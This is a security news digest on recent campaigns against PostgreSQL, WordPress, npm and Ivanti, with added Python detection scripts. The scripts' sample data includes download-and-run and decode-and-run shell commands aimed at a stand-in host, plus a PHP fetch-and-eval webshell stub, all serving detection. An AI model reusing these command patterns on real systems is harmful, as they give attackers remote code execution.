
Programmer’s Digest #128

03/26/2025-04/02/2025: Over 1,500 PostgreSQL Servers Compromised; New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor; and More.

1. Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign

An ongoing campaign targets exposed PostgreSQL instances to deploy cryptocurrency miners, with over 1,500 victims reported. The attackers use PG_MEM malware and employ defense evasion techniques like fileless miner payloads and unique binary hashes per target.

The campaign exploits weak PostgreSQL configurations, using the COPY ... FROM PROGRAM command to run arbitrary shell commands. The attackers deploy a Base64-encoded shell script to disable competing miners and drop PG_CORE, along with an obfuscated Golang binary named postmaster. This binary creates a cron job for persistence, elevates privileges, and downloads the XMRig miner. Each compromised machine is assigned a unique mining worker, with the campaign reportedly utilizing over 1,500 machines across multiple wallets.
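The COPY ... FROM PROGRAM abuse described above leaves a trace in PostgreSQL's statement log. The following detection logic is an added example, not code from the report: it runs over a constructed log excerpt (log_statement = 'all' with a '%t [%p] %u@%d ' line prefix, both assumptions) and flags any COPY that hands a shell command to the server, rating decode-and-run or download-and-run commands as high confidence.

```python
import re
from dataclasses import dataclass

# Constructed PostgreSQL log excerpt (log_statement = 'all', log_line_prefix = '%t [%p] %u@%d '); not from the report.
SAMPLE_LOG = """\
2025-03-28 10:14:02 UTC [2231] app@shop LOG:  statement: SELECT id FROM orders WHERE status = 'paid'
2025-03-28 10:14:09 UTC [2240] postgres@postgres LOG:  statement: COPY t FROM PROGRAM 'echo aGVsbG8= | base64 -d | sh'
2025-03-28 10:14:11 UTC [2240] postgres@postgres LOG:  statement: COPY batch FROM '/tmp/data.csv' WITH (FORMAT csv)
2025-03-28 10:14:30 UTC [2251] postgres@postgres LOG:  statement: copy  x  from   program 'curl -s http://example.invalid/x | sh'
2025-03-28 10:15:00 UTC [2260] postgres@postgres LOG:  statement: COPY t TO PROGRAM 'cat > /tmp/out'
"""

LINE = re.compile(r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@]+)@(?P<db>\S+) LOG:\s+statement: (?P<stmt>.*)$")
# COPY ... FROM PROGRAM runs a shell command as the server's OS user; TO PROGRAM pipes table data into one.
COPY_PROGRAM = re.compile(r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\b", re.IGNORECASE | re.DOTALL)
# Secondary indicators matching the campaign's pattern: decode-and-run or download-and-run.
SUSPICIOUS_SHELL = re.compile(r"base64\s+(-d|--decode)|\|\s*(sh|bash)\b|\b(curl|wget)\b", re.IGNORECASE)

@dataclass
class Finding:
    pid: int
    user: str
    db: str
    direction: str         # "FROM": command output loaded into a table; "TO": table contents piped to a command
    statement: str
    high_confidence: bool  # True when the command text also looks like decode-and-run or download-and-run

def scan(log_text: str) -> list[Finding]:
    """Return one Finding per logged statement that invokes COPY ... FROM/TO PROGRAM."""
    findings: list[Finding] = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        stmt = m["stmt"]
        hit = COPY_PROGRAM.search(stmt)
        if not hit:
            continue
        findings.append(Finding(
            pid=int(m["pid"]), user=m["user"], db=m["db"],
            direction=hit.group(1).upper(), statement=stmt,
            high_confidence=bool(SUSPICIOUS_SHELL.search(stmt)),
        ))
    return findings

def by_user(findings: list[Finding]) -> dict[str, int]:
    """Count PROGRAM invocations per database role, a quick way to spot an abused account."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.user] = counts.get(f.user, 0) + 1
    return counts
```

A non-superuser can only issue COPY ... FROM PROGRAM if it holds the pg_execute_server_program role, so a hit under any other account means that role was granted or the account is a superuser, and membership in that role is worth auditing alongside the log.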

2. New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth

Cybersecurity researchers have found an updated version of Hijack Loader, a malware loader that introduces new evasion techniques and enhances persistence. The loader now includes call stack spoofing to hide the origin of function calls and performs anti-VM checks to detect sandbox environments. First discovered in 2023, Hijack Loader delivers second-stage payloads like information stealers and bypasses security software.

The latest iteration adds call stack spoofing, which conceals malicious calls behind fabricated stack frames. It also integrates the Heaven’s Gate technique for process injection and delays execution by blocking Avast Antivirus processes. Two new modules, ANTIVM and modTask, enhance detection evasion and establish persistence through scheduled tasks.

Meanwhile, Elastic Security Labs revealed a new malware family, SHELBY, which uses GitHub for command-and-control and data exfiltration. The loader communicates via commits to a private repository, allowing attackers to send commands and access data without leaving detectable traces on disk.

3. Hackers Abuse WordPress MU-Plugins to Hide Malicious Code

Hackers are increasingly using the WordPress mu-plugins directory to run malicious code on every page load, evading detection. Code placed in the ‘wp-content/mu-plugins/’ folder runs automatically, without activation from the admin dashboard, and Sucuri found three types of malicious code planted there.

Mu-plugins can be used for legitimate functions, but their automatic execution makes them ideal for stealthy attacks. Sucuri identified three payloads:

  1. redirect.php – Redirects users to a fake browser update site to download malware.
  2. index.php – A webshell that fetches and executes PHP code remotely.
  3. custom-js-loader.php – Injects malicious JavaScript to hijack images and links.

These attacks can steal credentials, harm a site’s reputation, and install malware. To prevent infections, Sucuri advises updating plugins, disabling unnecessary ones, and using strong passwords with multi-factor authentication.
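Because must-use plugins load without activation, the directory deserves its own periodic audit. This is an added example, not Sucuri's tooling: it rates each PHP file under mu-plugins by indicator patterns modelled on the three payload types above (remote fetch plus eval, redirect, front-end script injection), using constructed, non-functional sample files.

```python
import re
import tempfile
from pathlib import Path

# Indicator patterns for the three payload types described by Sucuri (constructed here, not Sucuri's own rules).
INDICATORS = {
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    "dynamic_eval": re.compile(r"\b(eval|create_function)\s*\(", re.I),
    "decoder": re.compile(r"\b(base64_decode|gzinflate|str_rot13|hex2bin)\s*\(", re.I),
    "redirect": re.compile(r"\bheader\s*\(\s*['\"]Location:|\bwp_redirect\s*\(", re.I),
    "front_end_hook": re.compile(r"add_action\s*\(\s*['\"](wp_footer|wp_head)['\"]", re.I),
    "external_script": re.compile(r"<script[^>]+src=['\"]https?://", re.I),
}
STRONG = {"remote_fetch", "dynamic_eval", "redirect"}  # rarely legitimate inside a must-use plugin

def scan_source(source: str) -> set[str]:
    return {name for name, rx in INDICATORS.items() if rx.search(source)}

def risk(hits: set[str]) -> str:
    if hits & STRONG:
        return "high"
    if len(hits) >= 2:
        return "medium"
    return "low" if hits else "clean"

def audit_mu_plugins(mu_dir: Path) -> dict[str, str]:
    """Rate every .php file under the mu-plugins directory; these load on each request without activation."""
    return {p.name: risk(scan_source(p.read_text(errors="replace"))) for p in sorted(mu_dir.rglob("*.php"))}

# Constructed samples named after the three payloads in the report plus one benign mu-plugin; none is a working payload.
SAMPLES = {
    "disable-xmlrpc.php": "<?php\nadd_filter('xmlrpc_enabled', '__return_false');\n",
    "redirect.php": "<?php\nif (!is_admin()) { header('Location: https://example.invalid/update'); exit; }\n",
    "index.php": "<?php\n$s = file_get_contents('https://example.invalid/stage.txt');\neval(base64_decode($s));\n",
    "custom-js-loader.php": "<?php\nadd_action('wp_footer', function () {\n  echo '<script src=\"https://example.invalid/l.js\"></script>';\n});\n",
}

def audit_samples() -> dict[str, str]:
    """Write the samples into a temporary wp-content/mu-plugins tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        mu_dir = Path(tmp) / "wp-content" / "mu-plugins"
        mu_dir.mkdir(parents=True)
        for name, src in SAMPLES.items():
            (mu_dir / name).write_text(src)
        return audit_mu_plugins(mu_dir)
```

Point audit_mu_plugins at a real wp-content/mu-plugins path to use it on a site; a "high" rating is a prompt to read the file, not proof of compromise.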

4. Multiple npm Crypto Packages Hijacked

Sonatype has uncovered multiple hijacked npm cryptocurrency packages designed to steal sensitive information like API keys and SSH keys. These packages, some of which have been on npm for up to 9 years, were recently updated with malicious, obfuscated scripts.

The hijacked packages, tracked as sonatype-2025-000924, include scripts that exfiltrate sensitive data to a remote server after installation. Some of them, such as “bnb-javascript-sdk-nobroadcast,” had not been updated in years before the malicious release appeared.

Sonatype researchers suspect the hijacks may be the result of compromised npm maintainer accounts, possibly due to credential stuffing or expired domain takeovers. This incident highlights the importance of securing developer accounts with two-factor authentication (2FA) and improving supply chain security practices. Developers must remain vigilant in monitoring third-party software registries to mitigate risks associated with malicious updates in open-source packages.
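Two of the signals in this story, a release landing after years of dormancy and that release adding an install-time script, can be checked from the registry's own metadata before a dependency is upgraded. The check below is an added example, not Sonatype's code: it reads a constructed packument fragment in the shape of the npm registry's per-package document (the time map and per-version scripts are real fields; the package name and dates are made up).

```python
from datetime import datetime, timezone

# Constructed packument fragment in the shape of the npm registry's /<name> document (only the fields used here).
PACKUMENT = {
    "name": "example-sdk",
    "dist-tags": {"latest": "1.4.1"},
    "time": {
        "created": "2016-02-10T12:00:00.000Z",
        "1.4.0": "2017-05-01T09:30:00.000Z",
        "1.4.1": "2025-03-26T09:30:00.000Z",
    },
    "versions": {
        "1.4.0": {"scripts": {"test": "mocha"}},
        "1.4.1": {"scripts": {"test": "mocha", "postinstall": "node setup.js"}},
    },
}
LIFECYCLE = {"preinstall", "install", "postinstall", "prepare"}  # scripts npm runs during installation

def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)

def release_gap_days(pkg: dict) -> tuple[str, str, int]:
    """Return (previous_version, latest_version, days between them) from the registry's time map."""
    releases = sorted(((v, _ts(t)) for v, t in pkg["time"].items() if v not in ("created", "modified")),
                      key=lambda item: item[1])
    (prev, prev_t), (latest, latest_t) = releases[-2], releases[-1]
    return prev, latest, (latest_t - prev_t).days

def new_lifecycle_scripts(pkg: dict, prev: str, latest: str) -> set[str]:
    """Lifecycle scripts present in the latest version but absent from the previous one."""
    old = set(pkg["versions"][prev].get("scripts", {})) & LIFECYCLE
    new = set(pkg["versions"][latest].get("scripts", {})) & LIFECYCLE
    return new - old

def assess(pkg: dict, dormant_days: int = 730) -> dict:
    """Flag a release that follows long dormancy and/or introduces install-time scripts."""
    prev, latest, gap = release_gap_days(pkg)
    added = new_lifecycle_scripts(pkg, prev, latest)
    flags = []
    if gap >= dormant_days:
        flags.append(f"released after {gap} days of dormancy")
    if added:
        flags.append("new lifecycle scripts: " + ", ".join(sorted(added)))
    return {"package": pkg["name"], "previous": prev, "latest": latest, "gap_days": gap, "flags": flags}
```

In practice the packument comes from the registry (for example npm view <name> --json) and the dormancy threshold is a policy choice; either flag alone is a reason to diff the published tarball before upgrading.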

5. RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features

CISA has uncovered a new malware called RESURGE, exploiting a now-patched vulnerability in Ivanti Connect Secure (ICS) appliances. RESURGE shares features with the SPAWNCHIMERA malware but adds distinct commands that alter its behavior, and it can act as a rootkit, dropper, backdoor, proxy, and tunneler. The security flaw (CVE-2025-0282) affects several Ivanti products and could allow remote code execution. It has been weaponized to deliver the SPAWN ecosystem, linked to a China-based espionage group, UNC5337. SPAWNCHIMERA, the previous malware variant, was observed being used to patch this vulnerability.

RESURGE includes features like web shell deployment, credential harvesting, and manipulation of integrity checks. CISA also discovered two other malicious artifacts on compromised ICS devices. Organizations are urged to patch Ivanti systems, reset credentials, and monitor accounts for anomalous activity.
